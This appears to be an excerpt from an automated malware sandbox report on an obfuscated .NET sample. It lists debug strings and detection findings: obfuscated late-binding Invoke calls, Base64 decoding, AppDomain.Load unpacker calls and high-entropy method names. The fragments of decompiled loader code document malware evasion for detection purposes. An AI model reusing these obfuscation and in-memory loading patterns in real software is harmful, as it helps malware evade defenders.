                  Source: Binary string: System.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: 0C:\Windows\mscorlib.pdb source: TJXpRilNkh.exe, 00000000.00000002.3564900844.000000001C0E9000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Core.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: TJXpRilNkh.exe, 00000000.00000002.3559504112.000000001B4C6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: TJXpRilNkh.exe, 00000000.00000002.3565307904.000000001C418000.00000004.00000020.00020000.00000000.sdmp, TJXpRilNkh.exe, 00000000.00000002.3559504112.000000001B453000.00000004.00000020.00020000.00000000.sdmp, WER443E.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: TJXpRilNkh.exe, 00000000.00000002.3565307904.000000001C3F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Desktop\TJXpRilNkh.PDB+ source: TJXpRilNkh.exe, 00000000.00000002.3565307904.000000001C3F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Drawing.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Core.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: indoC:\Windows\mscorlib.pdb source: TJXpRilNkh.exe, 00000000.00000002.3564900844.000000001C0E9000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER443E.tmp.dmp.19.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: TJXpRilNkh.exe, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ryn00dsw45kmfXR9RCtzrvegpa2URxIkNjtL7cBnewoI2cSAxk0BtQUhCMkZQmjk047.YDGWOKBSeU1IijRFovUjFReYoYH9zHl3gnTXWQohMc7dSy1QuhuXCvdM19NLESP6VIQ,ryn00dsw45kmfXR9RCtzrvegpa2URxIkNjtL7cBnewoI2cSAxk0BtQUhCMkZQmjk047.S2pkyyWUkks8OxzUPgLXSAOibfqMLSvmRbOPqGQMBv6HnvNF4e8EvUSOfoMikiRVVjy,ryn00dsw45kmfXR9RCtzrvegpa2URxIkNjtL7cBnewoI2cSAxk0BtQUhCMkZQmjk047.V2vBoZxm9d7NbodoFleg7ENsbFxW4L6xqw4ixr5Ol7ZPBGnMEVBoS5olOGGBvls7IBi,ryn00dsw45kmfXR9RCtzrvegpa2URxIkNjtL7cBnewoI2cSAxk0BtQUhCMkZQmjk047.MNi5bjF3U1fmxLrcKoucaEMcMGFqVrmH6ikF9NWhh7Jbqx6dK6aF8rzxRsaJeC0nbap,rsSD4qMRL7xm0dmGDub2hw6w1LhtScmojnax67xqzIwo0FKmZT3Etcj6FeQCSoEBydXYwNIAzwCXXJCjOdl8._0f1Mj8U7kaWRw1KMXtZWJ19HJ7Vt7Q5wmFYkCs3WwTgBqA0WTpNJkpviZVMFNaj5o5Uq5YrDGm41AgfZe5Do()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: TJXpRilNkh.exe, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QeQmWWacZUaURHwOwncqtMv1f4uw1Cqju2hSZmwKtnvQWDxCb2jZFucWxxsArhnnlIGibxAmo6Xw7W8kU6yhxJjLnZClT6gWt0n[2],rsSD4qMRL7xm0dmGDub2hw6w1LhtScmojnax67xqzIwo0FKmZT3Etcj6FeQCSoEBydXYwNIAzwCXXJCjOdl8.hcOnGlO115hk6CYWG3Le814w827hsaVKtQnHv6xumvPShqQNZ1gGIcCBg1KTzv7TA0pizQfPEGVksNmUuMSP(Convert.FromBase64String(QeQmWWacZUaURHwOwncqtMv1f4uw1Cqju2hSZmwKtnvQWDxCb2jZFucWxxsArhnnlIGibxAmo6Xw7W8kU6yhxJjLnZClT6gWt0n[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: TJXpRilNkh.exe, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QeQmWWacZUaURHwOwncqtMv1f4uw1Cqju2hSZmwKtnvQWDxCb2jZFucWxxsArhnnlIGibxAmo6Xw7W8kU6yhxJjLnZClT6gWt0n[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: TJXpRilNkh.exe.0.dr, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ryn00dsw45kmfXR9RCtzrvegpa2URxIkNjtL7cBnewoI2cSAxk0BtQUhCMkZQmjk047.YDGWOKBSeU1IijRFovUjFReYoYH9zHl3gnTXWQohMc7dSy1QuhuXCvdM19NLESP6VIQ,ryn00dsw45kmfXR9RCtzrvegpa2URxIkNjtL7cBnewoI2cSAxk0BtQUhCMkZQmjk047.S2pkyyWUkks8OxzUPgLXSAOibfqMLSvmRbOPqGQMBv6HnvNF4e8EvUSOfoMikiRVVjy,ryn00dsw45kmfXR9RCtzrvegpa2URxIkNjtL7cBnewoI2cSAxk0BtQUhCMkZQmjk047.V2vBoZxm9d7NbodoFleg7ENsbFxW4L6xqw4ixr5Ol7ZPBGnMEVBoS5olOGGBvls7IBi,ryn00dsw45kmfXR9RCtzrvegpa2URxIkNjtL7cBnewoI2cSAxk0BtQUhCMkZQmjk047.MNi5bjF3U1fmxLrcKoucaEMcMGFqVrmH6ikF9NWhh7Jbqx6dK6aF8rzxRsaJeC0nbap,rsSD4qMRL7xm0dmGDub2hw6w1LhtScmojnax67xqzIwo0FKmZT3Etcj6FeQCSoEBydXYwNIAzwCXXJCjOdl8._0f1Mj8U7kaWRw1KMXtZWJ19HJ7Vt7Q5wmFYkCs3WwTgBqA0WTpNJkpviZVMFNaj5o5Uq5YrDGm41AgfZe5Do()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: TJXpRilNkh.exe.0.dr, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QeQmWWacZUaURHwOwncqtMv1f4uw1Cqju2hSZmwKtnvQWDxCb2jZFucWxxsArhnnlIGibxAmo6Xw7W8kU6yhxJjLnZClT6gWt0n[2],rsSD4qMRL7xm0dmGDub2hw6w1LhtScmojnax67xqzIwo0FKmZT3Etcj6FeQCSoEBydXYwNIAzwCXXJCjOdl8.hcOnGlO115hk6CYWG3Le814w827hsaVKtQnHv6xumvPShqQNZ1gGIcCBg1KTzv7TA0pizQfPEGVksNmUuMSP(Convert.FromBase64String(QeQmWWacZUaURHwOwncqtMv1f4uw1Cqju2hSZmwKtnvQWDxCb2jZFucWxxsArhnnlIGibxAmo6Xw7W8kU6yhxJjLnZClT6gWt0n[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: TJXpRilNkh.exe.0.dr, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QeQmWWacZUaURHwOwncqtMv1f4uw1Cqju2hSZmwKtnvQWDxCb2jZFucWxxsArhnnlIGibxAmo6Xw7W8kU6yhxJjLnZClT6gWt0n[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  .NET source code contains potential unpacker
                  Source: TJXpRilNkh.exe, rsSD4qMRL7xm0dmGDub2hw6w1LhtScmojnax67xqzIwo0FKmZT3Etcj6FeQCSoEBydXYwNIAzwCXXJCjOdl8.cs.Net Code: wqgR0QqswkTM4P52U6u71UP5PXnvFra0vb0HzW9csZ8cL6U3eYi2PX2DyKBEnr6CVgd5iwbafXDsS8fzq0hp System.AppDomain.Load(byte[])
                  Source: TJXpRilNkh.exe, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.cs.Net Code: chiMCkTl9ujEwv1QmXXkUuYb2EMVb7zNPyiSmSS2In3aoZZChwNLFrpnAI7U3rWC8wY2e2EhBb18oKSSpibGItRwVTglsixvlUa System.AppDomain.Load(byte[])
                  Source: TJXpRilNkh.exe, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.cs.Net Code: e6be9xTUCOG3z4xGVIg4vXt3XTLvWYUmcwALFtCo6Iw1VU5dsONZU49wRb2wOD8enDBBMukw1c4M6pkSddLkT7PziKKJvbhB28Y System.AppDomain.Load(byte[])
                  Source: TJXpRilNkh.exe, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.cs.Net Code: e6be9xTUCOG3z4xGVIg4vXt3XTLvWYUmcwALFtCo6Iw1VU5dsONZU49wRb2wOD8enDBBMukw1c4M6pkSddLkT7PziKKJvbhB28Y
                  Source: TJXpRilNkh.exe.0.dr, rsSD4qMRL7xm0dmGDub2hw6w1LhtScmojnax67xqzIwo0FKmZT3Etcj6FeQCSoEBydXYwNIAzwCXXJCjOdl8.cs.Net Code: wqgR0QqswkTM4P52U6u71UP5PXnvFra0vb0HzW9csZ8cL6U3eYi2PX2DyKBEnr6CVgd5iwbafXDsS8fzq0hp System.AppDomain.Load(byte[])
                  Source: TJXpRilNkh.exe.0.dr, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.cs.Net Code: chiMCkTl9ujEwv1QmXXkUuYb2EMVb7zNPyiSmSS2In3aoZZChwNLFrpnAI7U3rWC8wY2e2EhBb18oKSSpibGItRwVTglsixvlUa System.AppDomain.Load(byte[])
                  Source: TJXpRilNkh.exe.0.dr, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.cs.Net Code: e6be9xTUCOG3z4xGVIg4vXt3XTLvWYUmcwALFtCo6Iw1VU5dsONZU49wRb2wOD8enDBBMukw1c4M6pkSddLkT7PziKKJvbhB28Y System.AppDomain.Load(byte[])
                  Source: TJXpRilNkh.exe.0.dr, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.cs.Net Code: e6be9xTUCOG3z4xGVIg4vXt3XTLvWYUmcwALFtCo6Iw1VU5dsONZU49wRb2wOD8enDBBMukw1c4M6pkSddLkT7PziKKJvbhB28Y
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D4D2A5 pushad ; iretd 2_2_00007FF848D4D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E609B8 push E95ABAD0h; ret 2_2_00007FF848E609C9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E600BD pushad ; iretd 2_2_00007FF848E600C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F32316 push 8B485F94h; iretd 2_2_00007FF848F3231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D7D2A5 pushad ; iretd 5_2_00007FF848D7D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F62316 push 8B485F91h; iretd 5_2_00007FF848F6231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848D4D2A5 pushad ; iretd 8_2_00007FF848D4D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848E600BD pushad ; iretd 8_2_00007FF848E600C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F32316 push 8B485F94h; iretd 8_2_00007FF848F3231B
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 13_2_00007FF848E600BD pushad ; iretd 13_2_00007FF848E600C1
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 14_2_00007FF848E700BD pushad ; iretd 14_2_00007FF848E700C1
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 16_2_00007FF848E700BD pushad ; iretd 16_2_00007FF848E700C1
                  Source: TJXpRilNkh.exe, T2Rsl7VnIV06d7SoPRfXSdqAIc.csHigh entropy of concatenated method names: 'lK8XMO035DJyZxTfiaCnXoi9Sd', 'fDwKj7F59PvJv84nPUuSYgzCVh', '_6PWKCQmUtvL8bWF10avJ7Iu1QP', 'f3tcm1WCulCCtmLNQVa0QUQ9qG', 'WAJawx5dSJz7LObuEgRB4KbFCp', 'ZHHwPAxumTZmMPjGTC2pziaBmf', 'X0sAIXmJSNnJaS6RNsAb4W22pZ', 'rdelTAyF5k5O1BM2IAAjpq0G3D', 'ZxxsG0vQZ2Vd8GrHo9c0HDROuZ', 'wL7Fa1dQiJuVBumu8mU6XKnFxy'
                  Source: TJXpRilNkh.exe, 5ux9ggyZSCAev4EoyLa6sCU5Ab4KD3p89aYkTFwvyCRLPMutbNUpWStEbcOL8P28faV.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'EjLA1vnfP2Pl3rNVbNXHjnpJyy', 'MMPvZvifa0eTeSpmYOfYHfLYkK', 'WWMnJyTBijor2naY3fHylieKXx', '_9EjKudeoGM8HgOfXMfifRP1sor'
                  Source: TJXpRilNkh.exe, DTPYNQ3UugQdtB65ZVHD6e1lZGyGpii428kes6he0Ugprr9hAQlmnchYlYpHqlDEGOqCTq5oQiE5wG36aIF1WZ1uNEWbJypubSS.csHigh entropy of concatenated method names: 'gHP1Yem231p3k6n38Jl2N85X3XjMw5DUYmkk8NYFhSCfpHk9tuw9VabTNZAVT1fGSoaAYVeZkiFi7L3ixTVPxLsaad0gXs2kiQs', 'DeqcYUfl0srwhagvQM1STvSCDOLcgNMdaY8y0Q7sYZTb9jC5SLO0RH301EQ9RABtNU8qcZ1UH90F0eUCMyPEkQvYW5tVLbAnHql', 'N0GQJMtZ22AqTAp78SnVMeUlP86o3MJpiqAl76w3jUAKjaveXxGaoTfCdrWi6A3YnOX1gbNhzf1apqXGJ21Y', '_3gXQ0WIe5bYyVsfLAp6QkyZe4nZYekLvJB0DBWt5q3ZV5S4SAEXy2qvhBtJ97ltHET03BK1rKb32GWFUDUwF', 'DmtQzHdCCnwD9NLidJnot1eegz8ys91hMJ4zo6Rtu3lmv06HIwR1fYHZNj4QqnrRtE5DEOdcrj1prer1YMPu', 'CzbDHLaduvAh99yXDC6jkQRovZU4fqX1CniM9ShHn5pXcdQnlgU19onymqvJcFMvEHBcWXCs1Mrn5HilOV35', 'KnZe3NjTGlmdMhSx2etV5BjZ7UIduHWmEQFjgLBaEpDPQXBdCP9KHRPlUlBZHKCrRDsQcd2D9k5LYHAQvLdH', '_3qi8oPtpiYeZvWzdUnSnBcJELsP1q00UEfgtzYRXj8TNdN1YK9PRlUMz8XjH7Xhe4kw7cFfnBQT75DSgpPkS', '_9sIxAvIvNBGzMGRe7YF8TpwzF7mLSYlUuj3PHe4WiZFTQWaWWOkj3YXnRuOyzOhhJjDA1u0mjC1RYx7CYmm9', 'ebBghufmDYdZsRA9izogCc1GNkhEEvmNjz3javomnx9Y12sd2uRm4A5Ani2E4KFJYb9z2kO2XQatCDsnmJDV'
                  Source: TJXpRilNkh.exe, rsSD4qMRL7xm0dmGDub2hw6w1LhtScmojnax67xqzIwo0FKmZT3Etcj6FeQCSoEBydXYwNIAzwCXXJCjOdl8.csHigh entropy of concatenated method names: 'Z7NQLRPK3SeptgX3OnQloKRPElIakr4Jb3EuFKFa5tORawrGnBkD14Pm3DPuBMoz1u2vjMSiuzF3zYvXl632', 'davQ2TqoFyGDS4MPJQTfuOb5AjA8sauSih70ioZljJuoKhOF6DhkFoadqZyLNZ85PIzomCQZkMIpyVCmzMzb', 'FA9geVvvBgNEMeFtHR01nO8k6saKA9DIGX2hcoe38bKF3MZ1m61NoM9H4oUgcLZmdktMQ69AtfwJ4UbpDvyK', '_87YhJCFynTnTFMedp1qzxjBZzzq3WkpgXwfHRJj7FgTBVTmbDlOttQFKI37tCg6W33ucMD8LPAXhPE4XysMQ', 'cpPJZcvlUAwPefe3r5mpwayYCG4ytI3hi0YhYqOPqOovrntE7hR8FHSgOw0BUujrHeXrjLpUyJ2P6tsLVi0S', 'QFsxa9wtSfmWSLg7L17iJK1Jaq020VXpM2hGfYPG0Spi349mpSrEGFApG2gkK5SMoba1sD5ihnZn8qJzih8O', 'tO2z3QwOfCorqHg86oMXaMS6N1395aFbSjSyzMVcyw6ehNkAPZWoKFFYm7Mcfej915OUfiJZPoUZGGWeavU7', 'MIyamaEpGq0tlRBe8nQVsU827YB6CHzM47HwotNt3Oev7daKylX6leJvCIJVx5TtD0TLQwiWkNAAxCtAazHY', 'atXh9N7pvu6Yc2wewWPsMy7HvIMfI9x2MRyXtixvbbiOjOGNQhMqP1fTiYOQHEABV9OR7hgfdNCxqXlo8J3o', 'cZJnZD9L5e2GhZm23jxajSgOjLoKriVAOh5wLtcbDLtaGIIz2s9ifGvZig0uVuVjXlkPidrfEn7fkywAuCIx'
                  Source: TJXpRilNkh.exe, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.csHigh entropy of concatenated method names: 'lC9Jxj13dw4MYttUqrUEzq4LmsW7BgzW7qAtI72xtvKbK2a2cGsQ608dbCb8e36fgFmQEqLXlmQKrTTcmjlPQM1z6Px03iJe6ko', 'chiMCkTl9ujEwv1QmXXkUuYb2EMVb7zNPyiSmSS2In3aoZZChwNLFrpnAI7U3rWC8wY2e2EhBb18oKSSpibGItRwVTglsixvlUa', 'r2ftTvindq8HaXV8LAmx7022TJnfWxUjXPPXQufOzBXq5pfU7pj8eyycEUCIkC03gXGGITwclzje9jRRLEtKFCbXG7dtKmKA7fb', 'JhrBf2tA5gAgqlsUKfZYtAwNPbGsSuFYkR1lBqcWSUWIGmYsLhQhEqGmfFXg1RtHe3i5qAj6HXQ1N6EkbWNUxs3nXcMlMUpUFLo', 'eWuVtLCIhUSAbDztOZTqyX7sPgzwhmyJX7CATiqwxOJQ9FZiVITHSv6p0D45COFuN1Hr2c8Uep0JpbIYminmL0zkYYm0wr3MuH7', 'AGTv1dRX1k5ISQbyCG4k5g2v7ALhD5wH7DG8IfQ9Ib0wnrtNIeNwpyQm5u2lk2zmCubZ41rGJltahDJFLB0WIyU4DKkPfa8BH4R', 'CMkPb89YEydnxOwbRuq7zX5jHJ5kAQsCcEq5AFaLcJHWQylYJADM1odIBS6WFU9GNdzZI9nNmKCSxWYeCbOWqSFWtBgfGGo6HS6', 'tbFcFcuaE6NzU4eMRbmb1ywyzeJH21Ui5OodT2GS6OWFGWRgQYhl9GECdRBTero5Z1WWYigHT1P1peUWV2U9Eiy5RLjizig1gPH', 'iQeNSet6CHU1MOCsHL3ns7BldJiKBm9GNWDiPKDc7sduXbLuNhhtrwsqUa6OWCh5vCKszrUJRBFgn2SQ1oiCedpyVoSJeMdugVb', '_3hoPNO1wSuFDcO8qXBqXBFhKTtm5g6hzP13VckxdYTuhM7hjtwjqOEGpizQnDULkfjxt71naWwuB5HsOu5h6J4M9zIpfqrFgch2'
                  Source: TJXpRilNkh.exe, jJs4ARMPwDPanCnddAQg6sNpSmpAFoAzudaD6PVHv3d9KQxRnbZG4r1VrYMXO85zYN8xTLyIy8b8mZlvmSao.csHigh entropy of concatenated method names: 'bnNInY6pR73idqOySgRvaiM1ZJVYRct6iKQiQUSieTA2D51zqU4D1dUJmRX7wYhFfEixles6o6Sta73eqQRl', '_67xsJ61KiTIpO4BugxLToFPChR', '_6yNQ4G8kdmwrZLjvilST2yNC7d', 'Xqln1eRjwNZh9lc94oB4rw4JZp', 'q4yOF8NqK7z3g9RK7oStuAH8np'
                  Source: TJXpRilNkh.exe, PP9yI1ZiQFW8T0vwCvyxYnw44x9fEESgEULDxMjjh8UQCWIHoEPbDZNVJPW306LfySe1uVcAEP7H5xdm8vOWmLj306Yk9C9GnEB.csHigh entropy of concatenated method names: 'IlaJq4hjAbFBtSV0jU8r3xnGeJkzF31713Ff75fAG5LtIKe1YH2Arhex8S6fV1wVXtg4yLeWpRAKCktmy4Tkk0xh6qO7lGBBmSO', 'TjksGoXmuWTTZrQDcOSv9FHFfZWUXxYFnypWdqPWDGUQaMBrgyBKw0BpsA0wBsWRcVv0NTFh01dlYcUVQiTx8XdynZAM6hBOXmW', '_8kooXocolCcw7Lq9jQm57QsvDwML9PDi4TbnjC8NqolH90eHwcyhWsXSnymA7QUOfcotPeGJrafbMYCxkaEa4eBD0WOWV4MHuI2', 'G21Do2eoXtQ0xXIbqxstloRaJo', 'ziaT9luLX7Mc0Ua0ceM77ZJWNp', 'dsbPU9SeQEw3IYfCFYM4NDtIZz', 'AYevvdUlqRMUbi3181MtGlIvbL', 'Jr0Agmm5d9i8cYWQMRux3xjXga', 'QHIg5vr38WE4cC5sxExShwkpcI', 'XEDmw2d7deWpnUo3SksSEhVYih'
                  Source: TJXpRilNkh.exe, Nkogr82R2d1tZimBm8G0nqVzqkKSdoWqsltzj7NUlKOE0hHqLUxl3QKAOaqwg1yTYP8ZaJGeXnM23kP2D1122pVoqGVBMZgCwG4.csHigh entropy of concatenated method names: 'zyoRWLmQNcWOxWSO3LK2VBcRDu5oULsSURawvxzkaqutOCeOOJI6ketLvT0YErYYFXRdSvn6rcpkE0sZKtkO5sZoNhTFxCis5b8', 'yJ8ib8g8a3YO7HzqYp6MCn0YNEZklLYaOq3qhZZUs9de6ho2TYEmPlpCpG8Ws58knXXGq7nyI13xcOot0Ub531cst3tY0vP0CCl', 'gy7obP3y0gVR3Y35vAYtRcHmHzpYoQNRtbMitmZLhCc14mYLLm2DwDPnzWH6XErZ3rNmHecO9f9a5CjJjymUF9U9V15sT5tZXko', 'XYMdzI73lDgmzZ2yCtvDLwF2qLoWUtyqek106TLlMGQPEziodNRy9PROE04GH8QEEWb9itXQkfLQjlwCcUzTJ3DIIP9WS2kLPXX', '_6YTCeLvVnxgrzFHbDQIlXI32DLAWE9rDOnz9IMiAw04y6myUCidF1ZDBCfOZ2g2HVX3lby39Nu2wNaslBGdSvPlUAjSYyvSR67j', 'jAPwykflgGduEU4NGKPyQmok0NO32P70Wmx1bUNUrAsyvB8QJKN8DGXi49BB6TELuQbz0qKXmu418YrUcoAMHgESEaPxdqnXAiZ', 'dl2ute5WIKuyEQ3WM3vUmZtggsevGwK2msdXY7YQeGDUsIwEihdsr34j5UmZo8l09qqCfJP0OOM6q8TkoIlRWL0aVP2pgY15ndA', 'W9HNluOQvy9o6Pu2NaCaTpe8uvzYG6eKBRlSz8orIh0CMfSUnq2NwrWeOXp5BTDfXJQDUGS1BYN7UHLoo6UMR254KKfZuSpEEDP', 'DNL7IscQegJYXhuchq2l9ECaYfOgjY3cD8Nr2SC9A5eQavpbA6aYkHDwwttpaxsewghJI1JumHNLzNxIMeJlVz5RYcuthKQUNPT', 'lKQW8FncM0lvB0brF9gUlZ82JWUE1iCuBOXHLTtCC9inZXES5cq7IzBF5joQr0UySCLxsR1UpXW9o1wo5UJXiyDjz2YbOydP4KF'
                  Source: TJXpRilNkh.exe, ND8ILYiiFIGEo3pzU3VmmJ0ddDdERVyYnAJeIaXAF2hVhnkH5pMAi50b7Sc5naHBSxM.csHigh entropy of concatenated method names: '_0TtkUTVOHr5Dkc0OfNwVvEtoBS2cO9LYaJNTRRxPMFPNv6Z73gUl19oL0gh4vpPQpAN', 'X7Hl90LYY9rTUGnO19L6hBzGm05xKMn42jHntRw8ANASYSsPC23QZIorZUfhnbWaASs', 'DlKWV4PG5CZ2MMXZ6Kgkg5GLBKxn7LHhxAbBbuo2TNSMG2lHGcho8iJhBVCAW54wArO', 'eKH1u8zkaBHFXFYM9k10Eq8hReqKpd9viOTKK72fX4C3OnOUbRom3AO9NdB0iDhsd8n', 'cTKfArzd1GaCnc7GUJIcMGIKMhkjNqJtdUZQEzI3XETt1uwzDRFYR0mRoP7S4qN39mv', 'NrZFe0Zs0UpvVBsRP2g50bJ5gq', '_4LbTMngKPlShkFCBMyKOMcAXjf', 'XvCHW60MnjGBgAXKFwgJTdVYPk', 'ncOGK6OGSQRaOpHFaL5jTJne0T', 'dneee4u3HUKX1VAYD3KFjy2d9p'
                  Source: TJXpRilNkh.exe, Loa829qR9ROntzp7MYzhIcStiPKKU1HqqPoPaf2e9E5dAbwFGBWRJJShykytM1LLNhnwpBpSLa87dgkzyXr1JhthoAWC5zpxfKr.csHigh entropy of concatenated method names: 'yn7NerDdE0urGe6z7flkyE5tlbfykfBEeGq3I4vrkCXBT9eGaos7QqpJ3QQt88K0PRhu9YoVS1piUaKjX4jxruJehFD81DhpbPi', 'HEAT7JbSEV5YrYsaTyio0aOb2e', '_0GPp8HsMMbJtaetJpGGIibqHsQ', '_7JyE2BQdxMQvpNCG3xWWm8vijJ', 'D7DYDuCZfiUPcSQ0nJImqLdum6'
                  Source: TJXpRilNkh.exe, wGxByFRheuXlnAtF6wayMK4XwcGb1YUM70dZQeRvnPiJvyZAHpPAVAVrXZ6XM1tlL7tCIO4tIXvOtE6GGAQd.csHigh entropy of concatenated method names: 'bzETCl5smKzWDW3LKDus1VX8Vnde74DUXqtQBNpZ9xfPCIgf275ZgvUTDl3r36a8sznhaDwiwRilkEv5hrcC', 'bx5gJoHu8U5IuEIrUItx5bchvHjoXEXacNlSJkQ8rIZvvyyyk9G9zCkzsU34H3PPi8EzXvIE2cBDHRvHrAui', 'NulwL9bLEVQtsEOFvwQO6XuvBko7mlBRwinzpnEVpc3FDsSknh4ZG1ZOeLB1YMV67TJO04MoykbYsFyu3VQT', 'Q0uUdg2dzveL8peG1RBuwY5mdsVdyj3yr6zTPBGZW77oVgniU4pA4GU1UeKzKef39hQiLePIC1PXN7pB3dyJ', '_5ejIHz2TIPTCwnAaqmp5L9ALiT', 'oj0ur4DxZhYYURsJ5FXmA14pEm', 'mvf5rax4Dr5MhF1xZcDKpeg2ew', 'V5HT8YZaTlJa7EGkZ7zYIJbgDA', 'owEd1T4KwxaJz6z2kLgE3qseQA', '_4oiJw8HdEIFrGFvJquXX08xwpW'
                  Source: TJXpRilNkh.exe.0.dr, T2Rsl7VnIV06d7SoPRfXSdqAIc.csHigh entropy of concatenated method names: 'lK8XMO035DJyZxTfiaCnXoi9Sd', 'fDwKj7F59PvJv84nPUuSYgzCVh', '_6PWKCQmUtvL8bWF10avJ7Iu1QP', 'f3tcm1WCulCCtmLNQVa0QUQ9qG', 'WAJawx5dSJz7LObuEgRB4KbFCp', 'ZHHwPAxumTZmMPjGTC2pziaBmf', 'X0sAIXmJSNnJaS6RNsAb4W22pZ', 'rdelTAyF5k5O1BM2IAAjpq0G3D', 'ZxxsG0vQZ2Vd8GrHo9c0HDROuZ', 'wL7Fa1dQiJuVBumu8mU6XKnFxy'
